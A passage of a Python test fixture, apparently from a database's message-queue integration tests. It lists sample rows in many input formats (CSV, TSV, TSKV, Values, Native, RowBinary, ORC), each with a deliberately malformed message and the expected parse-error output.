'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION _CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> _CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
